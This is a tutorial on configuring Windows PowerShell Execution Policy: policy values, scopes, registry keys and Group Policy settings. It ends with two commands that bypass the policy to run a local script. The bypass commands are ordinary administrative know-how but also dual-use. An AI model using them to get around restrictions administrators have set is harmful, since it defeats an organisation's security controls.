By default, Windows settings prevent PowerShell scripts from running. From a security perspective, it is important to restrict untrusted and malicious code from running from PowerShell scripts. The Execution Policy determines the settings for running PowerShell scripts. In this article we’ll look at the available settings for running PS scripts on Windows, how to change the Execution Policy and configure PowerShell script execution policies for domain computers using GPO.
Running PowerShell Scripts Is Disabled on This System
When trying to run any PowerShell script (a PS1 file) on clean Windows 10, the following error occurs:
File C:\ps\script.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at https:/go.microsoft.com/fwlink/?LinkID=135170. + CategoryInfo : SecurityError: (:) [], PSSecurityException + FullyQualifiedErrorId : UnauthorizedAccess
You can get the current settings for PowerShell script Execution Policy in Windows using the following command:
Get-ExecutionPolicy
The following PowerShell Execution Policy values are available:
- Restricted – running PowerShell scripts is disabled, you can execute only interactive commands in the PS console;
- AllSigned – only signed PS scripts with a digital signature by a trusted publisher are allowed (you can sign a script using a self-signed certificate and add it to trusted root certificates). When running untrusted scripts, the following warning appears:
Do you want to run software from this untrusted publisher? File .ps1 is published by CN=test1 and is not trusted on your system. Only run scripts from trusted publishers.
- RemoteSigned – you can run local PowerShell scripts without any restrictions. You can run remote PS files with a digital signature (you cannot run PS1 files downloaded from the Internet or launched from a shared network folder via the UNC path);
- Unrestricted – all PowerShell scripts are allowed to run;When trying to run third-party PowerShell scripts, you may be prompted to confirm launch (see below).
- Bypass – running any PS files is allowed (no warnings are displayed). The policy is usually used to run PS scripts automatically without displaying any notifications (for example, when scripts are run via GPO, SCCM, Task Scheduler, etc.) and is not recommended for permanent use;
- Default – resets PowerShell script execution settings to the default ones;On Windows 10 the default value for PowerShell Execution Policy is Restricted, and on Windows Server 2016 it is RemoteSigned.
- Undefined – the policy is not set. The Restricted policy is applied to desktop OSs and RemoteSigned for server ones.
How to Allow PowerShell to Run Scripts Using the Execution Policy?
To change the current value of PowerShell script Execution Policy, the Set-ExecutionPolicy cmdlet is used.
For example, let’s allow to run local PS script files:
Set-ExecutionPolicy RemoteSigned
Confirm changing the Execution Policy for PS1 scripts by pressing Y or A.
To avoid showing the confirmation prompt, you may use the Force parameter.
Set-ExecutionPolicy RemoteSigned –Force
If you have set the value of the PowerShell Execution Policy to Unrestricted, you will still see the prompt when trying to run remote scripts from shared folders by the UNC paths or files downloaded from the Internet:
Security warning Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning message. Do you want to run? [D] Do not run [R] Run once [S] Suspend [?] Help (default is "D")
ZoneId identifier a browser sets in the alternative stream when downloading a file (see the article How does Windows know if a file was downloaded from the Internet?). You can unblock the file by checking Unblock in the file properties or clear the zone label using the Unblock-File cmdlet.You must also distinguish between different scopes of PowerShell Execution Policy:
- MachinePolicy – is set using GPO and applies to all users of a computer;
- UserPolicy – also set using GPO and applies to computer users;
- Process — Execution Policy settings are applied to the current PowerShell session only (and reset after the powershell.exe process is terminated);
- CurrentUser – the Execution Policy is applied to the current user only (a parameter of the HKEY_CURRENT_USER registry key);
- LocalMachine is a policy for all users of a computer (a parameter from the HKEY_LOCAL_MACHINE registry key).
You can set the policy scope using the Scope parameter of the Set-ExecutionPolicy cmdlet. For example:
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass –Force
Let’s check the current ExecutionPolicy settings for all scopes:
Get-ExecutionPolicy -List
Scope ExecutionPolicy ----- --------------- MachinePolicy Undefined UserPolicy Undefined Process Bypass CurrentUser Undefined LocalMachine RemoteSigned
The Execution Policy values you set using the Set-ExecutionPolicy cmdlet for CurrentUser and LocalMachine scopes are stored in the registry. For example, run this command:
Set-ExecutionPolicy -Scope LocalMachine -ExecutionPolicy Restricted –Force
Open the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell registry key and check the REG_SZ value of the ExecutionPolicy parameter. It should change to Restricted (the allowed parameter values are Restricted, AllSigned, RemoteSigned, Bypass, Unrestricted and Undefined).
The same settings for the CurrentUser scope are located under HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell.
Note that the ExecutionPolicy with the AllSigned value on the LocalMachine level is used in a corporate environment the most often. It provides the best balance between security and convenience. For personal use, you can use the RemoteSigned setting on your computer. The Bypass policy may be used only to run some tasks (for example, to run scripts using GPO or tasks in the Task Scheduler).
Set PowerShell Execution Policy in Active Directory Using GPO
You can configure the Execution Policy for PowerShell scripts on servers or domain computers in Active Directory domain using Group Policies.
- In the domain GPO editor (
gpmc.msc), create a new GPO or edit an existing one and link it to the OU containing computers you want to apply the PowerShell script Execution Policy to; - Open Computer Configuration -> Policies -> Administrative Templates -> Windows Components -> Windows PowerShell in the GPO editor and find the Turn on Script Execution parameter.There is the same policy in the user GPO section — User Configuration, but the computer policy has a higher priority.
- The policy may have three values:
- Allow only signed scripts – corresponding to the AllSigned policy
- Allow local scripts and remote signed scripts – corresponding to the PS RemoteSigned policy
- Allow all scripts – corresponding to the Unrestricted policy
- Set the policy value you want, save the GPO and update Group Policy settings on your computer;
- Make sure that new execution settings have been applied to the MachinePolicy scope.
After configuring the Execution Policy using GPO, you won’t be able to change script execution policy settings manually. If you try to change the Execution Policy settings on a computer the GPO is applied to, the following error appears:
Set-ExecutionPolicy: Windows PowerShell updated your execution policy successfully, but the setting is overridden by a policy defined at a more specific scope. Due to the override, your shell will retain its current effective execution policy of RemoteSigned. Type "Get-ExecutionPolicy -List" to view your execution policy settings.
How to Bypass the PowerShell Execution Policy on Windows?
There are some tricks that can help you if you want to run a PowerShell script on your computer without changing the Execution Policy settings. For example, I want to run a simple PS1 script that checks if it is run as an administrator.
You can get the script contents using Get-Content and redirect it to the standard input stream of the PS console.
Get-Content c:\ps\check_process_elevation.ps1 | PowerShell.exe -noprofile –
Or you can run a new powershell.exe process with the Bypass policy:
powershell.exe -noprofile -executionpolicy bypass -file c:\ps\check_process_elevation.ps1
1 comment
Amazing article! thank you alot
Please keep the good work